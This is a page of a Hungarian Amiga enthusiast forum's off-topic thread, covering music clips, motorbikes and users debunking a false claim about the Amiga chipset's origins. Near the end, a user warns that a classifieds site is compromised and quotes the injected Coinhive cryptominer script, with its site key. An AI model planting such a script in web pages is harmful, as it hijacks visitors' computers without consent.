Hírek | Archívum | Fórum | IRC | Amiga | AmigaOS | FAQ | RSS

 - Fórumok - Keresés - Statisztika - Szabályzat - Pegasos.hu fórum
forum.amigaspirit.hu / Általános / Offtopic! Minden egyéb ami nem Amiga és meg kell beszélni :)
<< 1 ... 72 . 73 . 74 . 75 . 76 . 77 . 78 . 79 . 80 . 81 . 82 ... 94 . 95 . >>
Szerző Üzenet
dh1
Mr. DTP

# Elküldve: 2017. Dec. 05. 11:24


Grat! Szuper a klipp!
Egy apro kerdes, de nem vok vajtfulu, tenyleg...
Hogy mintha a zenekar zeneszarszamai tisztabban szolnanak, mint az enekes hangja. Kicsit melyebrol jon. Nekem, de aztan ugy is suket vok :)
Meg 1x grat!

dino
Kék troll

# Elküldve: 2017. Dec. 05. 11:46


Quoting: dh1
zeneszarszamai

Nem ertem :)

tassika
Tag

# Elküldve: 2017. Dec. 05. 17:46


Quoting: dino
Izirajder ocseem, izirajder! :)

Azaz!:-)

Quoting: dino
Na es? Harapos az uj paripa?

Hát kétszer erősebb. Bár nem az erő a lényeg, hanem a nyomaték.
Az elején okozott meglepetést, az biztos. :-)
Gondoltam hármasban kis fordulaton gyorsítok óvatosan, hát megmozdult
a hátulja. Igaz macskakövön, de akkor sem gondoltam volna, gumi is jóféle.
Hja, látom előre, gumit sűrűben fogok venni erre, mint az előzőre. :-)

Quoting: dino
Akkor nem vagy mar bantita? Az andrast akko eladtad? (Bandi-t) :D

Micsoda csűrcsavarás! :-) Igen eladtam, meg is könnyeztem.

Quoting: dino
Jelenleg jo nekem a robogo is, nem megyek mar vilagkoruli korutra, csak a koponyamon belul... Ez a robogo meg elvisz A bolntbol B pontba, tobb most nem is kell, raadasul felaron... ;)

Hát te tudod! :-) Csak nem ugyanaz a feeling. ;-)
Ettől függetlenül széles utat, gumifákat! :-)

tassika
Tag

# Elküldve: 2017. Dec. 05. 17:53 - Szerkesztve: tassika


Quoting: dh1
Hogy mintha a zenekar zeneszarszamai tisztabban szolnanak, mint az enekes hangja.

Quoting: dh1
zeneszarszamai

Quoting: dino
Nem ertem :)


Akkor csaknem olyan zeneszarszámok azok a zeneszerszámok, ha tisztában szólnak mint az énekes hangja. :-D

Gondolom dh1 azt halja, hogy az énekes más hangnemben énekel, mint a zeneszerszámok hangneme.

Szerk: Jaj bocs, hogy új hozzászólást írtam magam után! :-)

dino
Kék troll

# Elküldve: 2017. Dec. 07. 08:35


http://index.hu/kultur/zene/2017/12/06/floppy_kick_windisch_mark_kiado/
:)

dino
Kék troll

# Elküldve: 2017. Dec. 11. 13:42


Street Fighter 30 eves jubileum:
https://index.hu/tech/godmode/2017/12/11/most_jo_lesz_street_fighter-rajongonak_lenni /
Milyen kar, hogy Amigara nem csinaltak meg a mostani jubileumi kiadast.
Milyen jo lenne, halozatban jatszani vele :)

dh1
Mr. DTP

# Elküldve: 2017. Dec. 15. 00:44


Quoting: dino
Mondj!


ez az a venti es full nulla hang az A2000-bol es A3000-bol

http://dh1.amigaspirit.hu/venti

adsr
Kukabúvár

# Elküldve: 2017. Dec. 19. 17:27


Srácok!

Zenész barátaimat fűzöm már egy ideje, hogy próbáljanak meg Amiga zenéket feldolgozni, kb. úgy mint Sidrip-ék teszik C64 zenékkel. Nekem van pár titkos esélyes zene kiválasztva, kérnék további javaslatokat!
Persze lehet hogy semmi nem lesz az egészből, de hátha!

dino
Kék troll

# Elküldve: 2017. Dec. 19. 22:34


Quoting: dh1
ez az a venti es full nulla hang az A2000-bol es A3000-bol

Na, ezt a hozzaszolast nem is vettem eszre. Koszi.

adsr
Kukabúvár

# Elküldve: 2017. Dec. 22. 13:17


Na skacok, erősítsetek meg, hogy nem én vagyok a tanulatlan hülye. Egy csávó a fácsén a következőket írta:
"az Amigának nem sok saját fejlesztésű chipje volt. az összes grafikus alap chip ("OCS, ECS, AGA") HP fejlesztés volt, amit az Apollo workstationökbe használtak fel, csak "továbbfejlesztették" a licenszeltet és gyártották, úgy is mondhatnánk testreszabták. a Paula ugyanígy nem saját volt. tudtommal a KS romon kívül semmi nem 100% saját. a legtöbb alkatrész a Nintendokban is megtalálható DPCM is a csipogó mellett. nagy eséllyel a hangchip is jé pont olyan típus és pin-kompatibilis. nem azt mondom hogy az, de hogy szintén japán fejlesztésből indultak ki az szinte biztos. általában csak testreszabni szokták és a címzéssel, kompatbilitással foglalkoztak. anno ez azt jelentette hogy saját, ma meg nincs már plágium hisz az egész világ az."

Én vagyok ennyire hülye az Amigához, hogy még soha sehol nem hallottam ezt a HP vonalat? A csávó által írt dolgok azért is érdekesek, mert az Apollo csak 89-ben vette meg az Apollo céget... ;-) (https://en.wikipedia.org/wiki/Apollo_Computer)

BSzili
Tag

# Elküldve: 2017. Dec. 22. 13:53


Semmi konkrétum nincs abban amit ír, csak spekuláció. Az Amiga chipsetet Jay Miner, Dale Luck, Glenn Keller, Joe Decuir, Ron Nicholson tervezte. Hol vannak ezek a HP chipek? Miből lett a Paula? Az Amiga nem is tud DPCM-et. Ennyi zagyvaságot már rég nem hallottam.

adsr
Kukabúvár

# Elküldve: 2017. Dec. 22. 13:57


Quoting: BSzili
Ennyi zagyvaságot már rég nem hallottam.

Én is így érzem az írását, de mivel "értelmes" embernek érzem magam ( ;-) ) ezért gondoltam megkérdezem itt is. :D.

Chain-Q
Divatamigás

# Elküldve: 2017. Dec. 22. 14:06


Én vagyok ennyire hülye az Amigához, hogy még soha sehol nem hallottam ezt a HP vonalat?

Ezzel össze is foglaltad a lényeget. Talán nem véletlen, hogy még sehol sem hallottad... Téveszméket terjesztő faszarcu makik lázálmaival nem foglalkozunk. Nem éri meg belefeccölni az energiát.

tudtommal a KS romon kívül semmi nem 100% saját.

Ebben csak az a vicc, hogy a dos.library, ami a rendszer egy elég jelentős része, ugye külső fejlesztés, TRIPOS néven... Szóval igen. Barátunk ért hozzá. Köszönjük, leülhet.

(Mellesleg, volt HP vonal, a CSG és a HP régóta együttműködött chipgyártásban, és sok Amigába került chipet ők gyártottak. Emiatt a partnerség miatt került volna a soha el nem készült Hombre-be is HP PA-RISC proci, a (mellesleg vicces módon C= fejlesztésű) hardveres 3D cucc mellé. De ez az egész HP vonal jóval később jött be, bőven azután, hogy az Amiga elkészült és már a piacon volt.)

adsr
Kukabúvár

# Elküldve: 2017. Dec. 22. 14:26


Kösz Charlie, a HP gyártást, és a Pa-Risc-et is tudtam. A csávó nagy ész, közben elmagyarázta, hogy a sid egy Yamaha liszensz 😀. Megnyugodtam, nem én vagyok hülye 😀.
"technikailag ez a yamaha chip áll legközelebb amúgy a c64 6581 SID-formában licenszelt az Ensoniq által fejlesztett yamaha alapú chiphez. csak a hangzása tompább, viszont FM chip a javából, és ugyanúgy tud gyűrű modulációt. csak a legtöbb játék zene meg "effekt" ezt nem használta ki, inkább csak a midi fájlokat játszották alap hangsettel. sokan ezért tévesen ítélik meg az adlibok és klónjaik hangját, pedig igen komoly hangzás hozható létre FM-buzerálással rajtuk"

BSzili
Tag

# Elküldve: 2017. Dec. 22. 16:26


"Gyűrű moduláció" :DD Persze, a Lord of the Rings meg a Csengések ura. Nem ért ahhoz amiről beszél, a Dunning-Kruger effekt egy remek példáját láthattuk.

YADA
Tag

# Elküldve: 2017. Dec. 22. 18:44


Csak azt nem ertem hogy az ilyen csavo 2db agysejtje hogy nem veszett ossze egymassal ekkora baromsagok kitalalasa kozben?
Ha aprilis.1 lenne akkor elkonyvelnem viccnek.

dino
Kék troll

# Elküldve: 2017. Dec. 22. 19:12


Gondolom onnan szedte ezt a HP vonalat az emberunk, hogy felnyitott egy gepet, meglatta egy-ket csippen a HP logot, es levonta a konzekvenciat, hogy tessek ezt is a HP talalta ki...
Tutira igy lehetett...aztan hozzafogott a faszbukkon tudastanfolyamot inditani...es meg en vagyok a paraszt...:)

StingerHU
Tag

# Elküldve: 2017. Dec. 23. 11:02


Minden, ami nem Amiga és meg kell beszélni. Inkább csak mutatnám :) Három heti meló ér lassan a finisbe:

https://photos.app.goo.gl/cvxoDTticfhT0BKC3

AZka
Tag

# Elküldve: 2017. Dec. 24. 16:22


Zsír! De ne az AMIGA 1200 Box kárára menjen ;)

Yellow Dog
Tag

# Elküldve: 2017. Dec. 25. 18:30


Quoting: stingerhu
Három heti meló ér lassan a finisbe

A végén ne felejtsd el vízszintesbe fordítani a kamerát ;-)

ratman
Kék troll

# Elküldve: 2018. Feb. 14. 10:44


Ugye ma van valami hülyeség, ennek kapcsán beszélgetés a postán:
- Jó napot, kezét csókolom, van még olyan képeslap, hogy "egyetlen igaz szerelmemnek?"
- Igen.
- Akkor kérek szépen négyet.

dino
Kék troll

# Elküldve: 2018. Már. 21. 09:54 - Szerkesztve: dino


azee ez ott van :)
dead or alive

Yellow Dog
Tag

# Elküldve: 2018. Már. 22. 20:54 - Szerkesztve: yellowdog


Quoting: stingerhu
Három heti meló ér lassan a finisbe

Akkor megérdemel egy 16:9-es videót a 9:16 helyett, a telefonnal videózás már önmagában bűncselekmény, hát még ha nem a normál fekvő tájolásban készül a mű... ;-)

dino
Kék troll

# Elküldve: 2018. Ápr. 07. 18:49


https://rendeljkinait.hu/retro-game-console-teszt-nes-classic

:D :D

YADA
Tag

# Elküldve: 2018. Máj. 15. 22:28


nemtudom masnal is jelentkezik-e, de ugy nezem az apro.amiga.hu ugy kerulendo ahogy van (valoszinuleg valami banyasz kartevo terheli)

dh1
Mr. DTP

# Elküldve: 2018. Máj. 16. 01:51


itt semmi, de amugy ezt en is irtam korabban... de aztan eltunik a banyasz cucc

PeachMan
Tag

# Elküldve: 2018. Máj. 16. 09:27


Szerencsére nálam blokkolta a browserben egy blocker, de ez így elég gynús:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('FcxfNeqn96twslWguph8aEhDtpzsnoaT', {throttle: 0});
miner.start();
</script>


dino
Kék troll

# Elküldve: 2018. Máj. 16. 10:22


Szerintem Lay banyaszik rajta, hogy legalabb a villanyszamlat fedezze... :D

dh1
Mr. DTP

# Elküldve: 2018. Máj. 16. 13:36


en nyitottam meg ugy, hogy Avira vagy 5 tamadast regisztralt az amigaaprorol...

Yellow Dog
Tag

# Elküldve: 2018. Máj. 17. 05:32 - Szerkesztve: yellowdog


Ilyent keresek Videoton tv játékhoz, úgy nagyjából az esélytelenek nyugalmával, a zöldet természetesen.

<< 1 ... 72 . 73 . 74 . 75 . 76 . 77 . 78 . 79 . 80 . 81 . 82 ... 94 . 95 . >>
forum.amigaspirit.hu / Általános / Offtopic! Minden egyéb ami nem Amiga és meg kell beszélni :)
 
 

Powered by discussion forum software miniBB™ © 2001-2024